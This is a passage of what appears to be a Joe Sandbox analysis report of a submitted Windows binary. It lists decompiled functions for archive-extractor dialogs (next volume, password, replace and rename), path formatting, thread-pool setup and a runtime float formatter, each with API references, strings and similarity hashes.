				_t31 = _a12;
				_t30 = _a4;
				_t27 = _a8;
				if(E0006130B(__edx, _t30, _t27, _t31, _t24, L"ASKNEXTVOL", 0, 0) != 0) {
					L14:
					__eflags = 1;
					return 1;
				}
				_t28 = _t27 - 0x110;
				if(_t28 == 0) {
					_push( *_t24);
					 *0xc0cb0 = _t24;
					L13:
					SetDlgItemTextW(_t30, 0x66, ??);
					goto L14;
				}
				if(_t28 != 1) {
					L6:
					return 0;
				}
				_t12 = (_t31 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t30, 0x66,  *( *0xc0cb0), ( *0xc0cb0)[1]);
					_push(1);
					L10:
					EndDialog(_t30, ??);
					goto L14;
				}
				_t16 = _t12 - 1;
				if(_t16 == 0) {
					_push(0);
					goto L10;
				}
				if(_t16 == 0x65) {
					_t19 = E0006BC85(__eflags,  *( *0xc0cb0));
					_t22 = E000610F0(_t30, E0006DDD1(_t25, 0x8e),  *( *0xc0cb0), _t19, 0);
					__eflags = _t22;
					if(_t22 == 0) {
						goto L14;
					}
					_push( *( *0xc0cb0));
					goto L13;
				}
				goto L6;
			}

0x0007a431
0x0007a436
0x0007a43b
0x0007a440
0x0007a458
0x0007a4e8
0x0007a4ea
0x00000000
0x0007a4ea
0x0007a45e
0x0007a464
0x0007a4d7
0x0007a4d9
0x0007a4df
0x0007a4e2
0x00000000
0x0007a4e2
0x0007a469
0x0007a47d
0x00000000
0x0007a47d
0x0007a46e
0x0007a471
0x0007a4cd
0x0007a4d3
0x0007a4b7
0x0007a4b8
0x00000000
0x0007a4b8
0x0007a473
0x0007a476
0x0007a4b5
0x00000000
0x0007a4b5
0x0007a47b
0x0007a48a
0x0007a4a3
0x0007a4a8
0x0007a4aa
0x00000000
0x00000000
0x0007a4b1
0x00000000
0x0007a4b1
0x00000000

APIs

Part of subcall function 0006130B: GetDlgItem.USER32(00000000,00003021), ref: 0006134F
Part of subcall function 0006130B: SetWindowTextW.USER32(00000000,000935B4), ref: 00061365

EndDialog.USER32(?,00000001), ref: 0007A4B8
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0007A4CD
SetDlgItemTextW.USER32(?,00000066,?), ref: 0007A4E2

Strings

ASKNEXTVOL, xrefs: 0007A448

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 6c3b43a5793fe816cd5f6de81a4610d2df9357a9d5eda142c69ed826d3c69401
Instruction ID: 3e228919ab229e652ef020f3d7cb37ff4e5cf1cc0977fec3e3687f1567d63ab6
Opcode Fuzzy Hash: 6c3b43a5793fe816cd5f6de81a4610d2df9357a9d5eda142c69ed826d3c69401
Instruction Fuzzy Hash: 0B11D332B44200AFEB219F689C4DF6E37A9FBCB301F144001F3099B0A1C7AA9901D72A

Uniqueness

Uniqueness Score: -1.00%

Function 0006D1C3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0006D1C3(void* __ebx, void* __ecx, void* __edi) {
				void* __esi;
				intOrPtr _t26;
				signed int* _t30;
				void* _t31;
				void* _t34;
				void* _t42;
				void* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t50;

				_t44 = __edi;
				_t43 = __ecx;
				_t42 = __ebx;
				_t48 = _t49 - 0x64;
				_t50 = _t49 - 0xac;
				_t46 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x2c)) > 0) {
					 *((intOrPtr*)(_t48 + 0x5c)) =  *((intOrPtr*)(_t48 + 0x6c));
					 *((char*)(_t48 + 8)) = 0;
					 *((intOrPtr*)(_t48 + 0x60)) = _t48 + 8;
					if( *((intOrPtr*)(_t48 + 0x74)) != 0) {
						E00071596( *((intOrPtr*)(_t48 + 0x74)), _t48 - 0x48, 0x50);
					}
					_t26 =  *((intOrPtr*)(_t48 + 0x70));
					if(_t26 == 0) {
						E0006FDFB(_t48 + 8, "s", 0x50);
					} else {
						_t34 = _t26 - 1;
						if(_t34 == 0) {
							_push(_t48 - 0x48);
							_push("$%s");
							goto L9;
						} else {
							if(_t34 == 1) {
								_push(_t48 - 0x48);
								_push("@%s");
								L9:
								_push(0x50);
								_push(_t48 + 8);
								E0006DD6B();
								_t50 = _t50 + 0x10;
							}
						}
					}
					_t16 = _t46 + 0x18; // 0x63
					_t18 = _t46 + 0x14; // 0x32445c8
					_t30 = E000858D9(_t42, _t43, _t44, _t46, _t48 + 0x58,  *_t18,  *_t16, 4, E0006CFE0);
					if(_t30 == 0) {
						goto L1;
					} else {
						_t20 = 0x9e158 +  *_t30 * 0xc; // 0x946b8
						E00085F40( *((intOrPtr*)(_t48 + 0x78)),  *_t20,  *((intOrPtr*)(_t48 + 0x7c)));
						_t31 = 1;
					}
				} else {
					L1:
					_t31 = 0;
				}
				return _t31;
			}

0x0006d1c3
0x0006d1c3
0x0006d1c3
0x0006d1c4
0x0006d1c8
0x0006d1cf
0x0006d1d5
0x0006d1e5
0x0006d1eb
0x0006d1ef
0x0006d1f2
0x0006d1fd
0x0006d1fd
0x0006d205
0x0006d208
0x0006d243
0x0006d20a
0x0006d20a
0x0006d20d
0x0006d222
0x0006d223
0x00000000
0x0006d20f
0x0006d212
0x0006d217
0x0006d218
0x0006d228
0x0006d22b
0x0006d22d
0x0006d22e
0x0006d233
0x0006d233
0x0006d212
0x0006d20d
0x0006d24f
0x0006d255
0x0006d259
0x0006d263
0x00000000
0x0006d269
0x0006d26f
0x0006d278
0x0006d280
0x0006d280
0x0006d1d7
0x0006d1d7
0x0006d1d7
0x0006d1d7
0x0006d287

APIs

__fprintf_l.LIBCMT ref: 0006D22E
_strncpy.LIBCMT ref: 0006D278

Strings

$%s, xrefs: 0006D223
@%s, xrefs: 0006D218

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: __fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 1857242416-834177443
Opcode ID: 739ba0db3e94741315bd08d16893993426a6abfc339047f4243b9c646fe9c001
Instruction ID: deef41cab78fda4140783c71135a2731d5c11bfa2e02ff88a131eff494003979
Opcode Fuzzy Hash: 739ba0db3e94741315bd08d16893993426a6abfc339047f4243b9c646fe9c001
Instruction Fuzzy Hash: 3821C372900249AADF20DEA4CC06FEE7BEAAF14300F040523FE149A192D371EA44DB51

Uniqueness

Uniqueness Score: -1.00%

Function 0007A990 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0007A990(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				short _v260;
				void* __ebx;
				void* _t15;
				signed short _t24;
				struct HWND__* _t28;
				intOrPtr _t29;
				void* _t30;

				_t24 = _a12;
				_t29 = _a8;
				_t28 = _a4;
				if(E0006130B(__edx, _t28, _t29, _t24, _a16, L"GETPASSWORD1", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t30 = _t29 - 0x110;
				if(_t30 == 0) {
					SetDlgItemTextW(_t28, 0x67, _a16);
					goto L10;
				}
				if(_t30 != 1) {
					L5:
					return 0;
				}
				_t15 = (_t24 & 0x0000ffff) - 1;
				if(_t15 == 0) {
					GetDlgItemTextW(_t28, 0x66,  &_v260, 0x80);
					E0006ECAD(_t24, 0xb6a78,  &_v260);
					E0006ECF8( &_v260, 0x80);
					_push(1);
					L7:
					EndDialog(_t28, ??);
					goto L10;
				}
				if(_t15 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}

0x0007a99a
0x0007a99e
0x0007a9a2
0x0007a9bb
0x0007aa2a
0x00000000
0x0007aa2c
0x0007a9bd
0x0007a9c3
0x0007aa24
0x00000000
0x0007aa24
0x0007a9c8
0x0007a9d7
0x00000000
0x0007a9d7
0x0007a9cd
0x0007a9d0
0x0007a9f6
0x0007aa08
0x0007aa15
0x0007aa1a
0x0007a9dd
0x0007a9de
0x00000000
0x0007a9de
0x0007a9d5
0x0007a9db
0x00000000
0x0007a9db
0x00000000

APIs

Part of subcall function 0006130B: GetDlgItem.USER32(00000000,00003021), ref: 0006134F
Part of subcall function 0006130B: SetWindowTextW.USER32(00000000,000935B4), ref: 00061365

EndDialog.USER32(?,00000001), ref: 0007A9DE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0007A9F6
SetDlgItemTextW.USER32(?,00000067,?), ref: 0007AA24

Strings

GETPASSWORD1, xrefs: 0007A9A9

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: 3136f02faaa6acd30cf5fd85c586a7eaa178570f3954c4dd38b5b751dc2180fa
Instruction ID: 0351b4f83e96c5c0bda7effca007e3c9b90d290f7d502a5ffca34b0c9475c795
Opcode Fuzzy Hash: 3136f02faaa6acd30cf5fd85c586a7eaa178570f3954c4dd38b5b751dc2180fa
Instruction Fuzzy Hash: E7112533E401187ADB219A649D09FFE376CEB8A310F004021FB49A2081C2699951D763

Uniqueness

Uniqueness Score: -1.00%

Function 0006B4F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0006B4F7(void* __ecx, void* __eflags, signed short* _a4, short* _a8, intOrPtr _a12) {
				short _t10;
				void* _t13;
				signed int _t14;
				short* _t20;
				void* _t23;
				signed short* _t27;
				signed int _t29;
				signed int _t31;

				_t20 = _a8;
				_t27 = _a4;
				 *_t20 = 0;
				_t10 = E0006B806(_t27);
				if(_t10 == 0) {
					_t29 = 0x5c;
					if( *_t27 == _t29 && _t27[1] == _t29) {
						_push(_t29);
						_push( &(_t27[2]));
						_t10 = E000815E8(__ecx);
						_pop(_t23);
						if(_t10 != 0) {
							_push(_t29);
							_push(_t10 + 2);
							_t13 = E000815E8(_t23);
							if(_t13 == 0) {
								_t14 = E000835B3(_t27);
							} else {
								_t14 = (_t13 - _t27 >> 1) + 1;
							}
							asm("sbb esi, esi");
							_t31 = _t29 & _t14;
							E00085842(_t20, _t27, _t31);
							_t10 = 0;
							 *((short*)(_t20 + _t31 * 2)) = 0;
						}
					}
					return _t10;
				}
				return E0006400A(_t20, _a12, L"%c:\\",  *_t27 & 0x0000ffff);
			}

0x0006b4f8
0x0006b4ff
0x0006b504
0x0006b507
0x0006b50e
0x0006b52b
0x0006b52f
0x0006b53a
0x0006b53b
0x0006b53c
0x0006b542
0x0006b545
0x0006b54a
0x0006b54b
0x0006b54c
0x0006b555
0x0006b55f
0x0006b557
0x0006b55b
0x0006b55b
0x0006b569
0x0006b56b
0x0006b570
0x0006b578
0x0006b57a
0x0006b57a
0x0006b545
0x00000000
0x0006b57e
0x00000000

APIs

_swprintf.LIBCMT ref: 0006B51E

Part of subcall function 0006400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0006401D

_wcschr.LIBVCRUNTIME ref: 0006B53C
_wcschr.LIBVCRUNTIME ref: 0006B54C

Strings

%c:\, xrefs: 0006B514

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: _wcschr$__vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 525462905-3142399695
Opcode ID: 287d7011146fafeb1de585f1c3471c13be2b2a724b41fd848315564320599a24
Instruction ID: 224e52ee4b9cb07e76d1cd2c459ffbd54b6c7f0f09673f765a2f58c0aa859d11
Opcode Fuzzy Hash: 287d7011146fafeb1de585f1c3471c13be2b2a724b41fd848315564320599a24
Instruction Fuzzy Hash: AF01D6A3914B11AADA306B659C42EEBB7EDEF957607504416F986C6082FF30D980C3A1

Uniqueness

Uniqueness Score: -1.00%

Function 000706BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E000706BA(long* __ecx, long _a4) {
				void* __esi;
				void* __ebp;
				long _t11;
				void* _t14;
				long _t23;
				long* _t25;

				_t19 = __ecx;
				_t11 = _a4;
				_t25 = __ecx;
				_t23 = 0x40;
				 *__ecx = _t11;
				if(_t11 > _t23) {
					 *__ecx = _t23;
				}
				if( *_t25 == 0) {
					 *_t25 = 1;
				}
				_t25[0x41] = 0;
				if( *_t25 > _t23) {
					 *_t25 = _t23;
				}
				_t3 =  &(_t25[0xc8]); // 0x320
				_t25[0xc5] = 0;
				InitializeCriticalSection(_t3);
				_t25[0xc6] = CreateSemaphoreW(0, 0, _t23, 0);
				_t14 = CreateEventW(0, 1, 1, 0);
				_t25[0xc7] = _t14;
				if(_t25[0xc6] == 0 || _t14 == 0) {
					_push(L"\nThread pool initialization failed.");
					_push(0xa0f50);
					E00066E8C(E00066E91(_t19), 0xa0f50, _t25, 2);
				}
				_t25[0xc3] = 0;
				_t25[0xc4] = 0;
				_t25[0x42] = 0;
				return _t25;
			}

0x000706ba
0x000706ba
0x000706c2
0x000706c6
0x000706c7
0x000706cb
0x000706cd
0x000706cd
0x000706d6
0x000706d8
0x000706d8
0x000706da
0x000706e2
0x000706e4
0x000706e4
0x000706e6
0x000706ec
0x000706f3
0x00070707
0x0007070d
0x00070713
0x0007071f
0x00070725
0x0007072f
0x0007073b
0x0007073b
0x00070741
0x00070749
0x0007074f
0x00070758

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0006ABC5,00000008,?,00000000,?,0006CB88,?,00000000), ref: 000706F3
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0006ABC5,00000008,?,00000000,?,0006CB88,?,00000000), ref: 000706FD
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0006ABC5,00000008,?,00000000,?,0006CB88,?,00000000), ref: 0007070D

Strings

Thread pool initialization failed., xrefs: 00070725

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 472ac533fd74fbec36946a0775fa4b189e93c66ea1291e89acf50ee6479e587e
Instruction ID: c76432c055eaa3db72ce857c30a30f7170d67bfb2c557cb2b688016bda317cff
Opcode Fuzzy Hash: 472ac533fd74fbec36946a0775fa4b189e93c66ea1291e89acf50ee6479e587e
Instruction Fuzzy Hash: 9711A0B1A04708AFD3305F65DC84AA7FBECFB95744F10892EF1DE82200D6766980CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0007D38B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0007D38B(long _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				WCHAR* _t16;
				_Unknown_base(*)()* _t19;
				int _t22;

				 *0xbdc88 = _a12;
				 *0xbdc8c = _a16;
				 *0xa8464 = _a20;
				if( *0xa8460 == 0) {
					if( *0xa8453 == 0) {
						_t19 = E0007B8E0;
						_t16 = L"REPLACEFILEDLG";
						while(1) {
							_t22 = DialogBoxParamW( *0xa0ed4, _t16,  *0xa8458, _t19, _a4);
							if(_t22 != 4) {
								break;
							}
							if(DialogBoxParamW( *0xa0ed0, L"RENAMEDLG",  *0xa844c, E0007CC90, _a4) != 0) {
								break;
							}
						}
						return _t22;
					}
					return 1;
				}
				return 0;
			}

0x0007d398
0x0007d3a0
0x0007d3a8
0x0007d3ad
0x0007d3ba
0x0007d3c4
0x0007d3c9
0x0007d3f3
0x0007d40a
0x0007d40f
0x00000000
0x00000000
0x0007d3f1
0x00000000
0x00000000
0x0007d3f1
0x00000000
0x0007d415
0x00000000
0x0007d3be
0x00000000

Strings

RENAMEDLG, xrefs: 0007D3DE
REPLACEFILEDLG, xrefs: 0007D3C9, 0007D3FD

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: af483a21efceeab37dce87b8b30b5ffed64b197feca4d29028564659aaae4843
Instruction ID: b20296a71158234d90831c58eb5cd61d5932c488b4a3587e8a6dbd48274065a2
Opcode Fuzzy Hash: af483a21efceeab37dce87b8b30b5ffed64b197feca4d29028564659aaae4843
Instruction Fuzzy Hash: AC017171E0424AAFEB518F14ED44E5A7FF9EB0A380B008433F50992271DA7E9C50FBA5

Uniqueness

Uniqueness Score: -1.00%

Function 000891DE Relevance: 6.3, APIs: 4, Instructions: 305
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E000891DE(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E00083DD6(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							_t30 = _v48 + 0x88; // 0xffce8305
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E0007E4E0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E0007E4E0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t116 = _t186 - 1;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E0007F350(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E0007E4E0( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E0007E820();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E0007E820();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E0007E820();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E000894E1(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E00091B20(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E0008895A();
					_t183 = 0x22;
					 *_t129 = _t183;
					E00088839();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}

0x000891de
0x000891e9
0x000891f0
0x000891f2
0x000891f2
0x000891f4
0x000891fd
0x000891ff
0x00089204
0x0008920a
0x00089220
0x00089225
0x00089228
0x00089235
0x0008923a
0x0008928e
0x00089296
0x00089298
